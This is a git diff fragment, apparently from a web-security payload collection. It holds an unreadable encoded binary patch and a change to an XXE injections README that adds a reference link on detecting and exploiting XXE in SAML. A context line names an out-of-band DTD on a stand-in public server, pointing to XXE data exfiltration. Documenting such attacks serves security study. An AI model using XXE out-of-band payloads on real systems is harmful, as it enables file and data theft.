z_dDl+6v!U8{oVH|3pj7CTAaQ0`)Nc>-hc|4JPiueKlviyqG01vvR#Zy%JqXs1<9{!
zVHBsq@$E9_!6sGheI*9RHa~zmr{0`^?QZ0LxLCIwWLM75j#JB)7f9;T!beE^%J*vp
zndy^K-tSdo-XL_AL9KZ;T>df-^QyB^H8Q6S;1a!-FU-W8+sBe>sDs+$7bgm3R*&*8
zEY3XP4`aq1?7S2X8-D=`UO$<M*1xusc<RseL@Zt3P=1D~)Xjhf{iXYW{WP25&CJY<
zdGQWrJS{1o&<MXG&Rl>PnZ`TLu3Tg5GI#h>b`N0uEf=Eosa9kgy$r;i2uZ#$@HXJP
zUB6QhSGEREnt@4jnVxW`mz@V6YgWgdB<1Davhhl#pI9eBaowrB7k7X+U>i=jT-aWy
z9a@G}Ek@<=oGzsMR{4>V4RK)VB4pEET&_Cib<CmCrVro6Qm+m7<;xeMVyu9%ULInK
z*mvQ3VyPFm*4QB5$16T?Tl_&>K_IW3`c&QHW0POSDmmLdB(-3;I%S)G0MK&=l>Oi$
z3O|UCUJ_=xc@|W-Nkw<F1`2&7RK=UC#`b|58E7T4kGT3xMrn2Hlt4J~u&nC;*_fIb
zYm4pz+W0?^=Z4llO5}!S--@+`jg5XAFO`9gyDqvJ_c1CzIVrqk@(u8LmT7!>M@5~t
z5oSMF4%G;9k%0pm?LszS`^o312sW+9F?Ln+iA>~eEt&U#OI~F@|48&A4xB)IqM;p}
z&IhY<e$O{@AB?3{p^1^NboPY{JKA+8SH2@WN*X<FH_Qmy;Gn_V=tTRVnX|o%6KKyZ
z(}ho8;7W|y_miR-E0b+1Y{#HEz2sYeTQiWED$YPk)RaT(vHnxH@viodjKcWVD=EZ8
z0c-1b0w`4=U!z2?s_g7%sxd>MytG8_*wQEQWDP-4_uHFXIjSWIw(kpnAE<tb+xb+c
zUZw%fMNosz#=&7$Q3G3k60LMe%66Mhpl<xAu@tL%M(sCsz6Y7}`W*4SDYIud5j|mB
z;8v^#PrfNzd?$S*bB!D=+ox2Zd^fD;(SvOd7(bh#FL$qwc;lw!`j%3EDuRa{P5M%<
zo4~>7naBt`%cky6_u1=@D^KY(eO^f=e%)t!A)Xs@RQ@Gd-wZTg%)r@uU&weoQF#)+
zgr6Md#-mmv&N~U4A^Sz4oO)Vp2zvfj!?4;px`<aYNi~49&vH&ZN4%eB80^OD@!BtN
zLD%TD<quiQP@g~bsp8QR%XAx=(x}h#w`Gs-M`_ak;lDDspSjDM-_g?S_WXioHq*+|
zTA=58TiwlUDBk4h{xs|Rq;EWC4K?Tqml^jX90ZQQ`Ato`NxQK>@2L63Qtyk4{I-jU
z#8_l#8|~K4>J!H?5DabL=ewqZWszUnE@;^#+zdJ4ELq@8+4nPgmbxa0lT`fcXhS=H
z?1b!TKoT14C|a2*)1Ztn9#m#IqDTlVMz{6b&b=3vw-+^gwq~my`U$P)0F!wSn-W~3
zPC$;?*20-&Y(?c=M8nXw6VDv7(A%|QCWFDx%H$Hx5|u9n5~e+L2_{VMc1~>4<X3`M
zyFR~RCVwevHW;5)*V&@*6wDV%q%igne~RZx=d#YG*JsqwDErRkJJGH_47}_1C$G(<
z>9k<zx;BJhw?$wo-6zIEnub-V3C5bk&qC-|O|Fj=Es)sXDJ?@=EwXu<+1GiB`XvF+
z;n2FrdlFHBsbjc4mADDc?>_Z|CbYj$u}9U82OC(qtD1(jx1B<ZDHRzN!M-62FeCZi
zk{@9L<sbL)AWPjVpkV$C-6sr4x$<rGQ2Y|ecBkJS-HIcwOzT4sceKY{wZAfZI97o_
z0=3}^1|hszjN{0BiL9;RRaDNvA~DdcP*YL)5Zm^Jmd)|ESo5z>8>5wkExeKMOCYmb
z0BAy1y7`G7N9Bw6kb<P_0*LCW4Na+~YIKTVh%!%hUMZ4!tu<r4$|VEWSBB!><dLV(
zBbA5|%iiOd#dCmqWQ}(?Kv>xdBqjNkOqC4$OtShr$k7>XDpB3OcS1QwV88dr%C`&t
G@_zv9zt++K

literal 0
HcmV?d00001

diff --git a/XXE injections/README.md b/XXE injections/README.md
index 186126d..325990b 100644
--- a/XXE injections/README.md	
+++ b/XXE injections/README.md	
@@ -82,4 +82,5 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
 
 
 ## Thanks to
-* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
\ No newline at end of file
+* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
\ No newline at end of file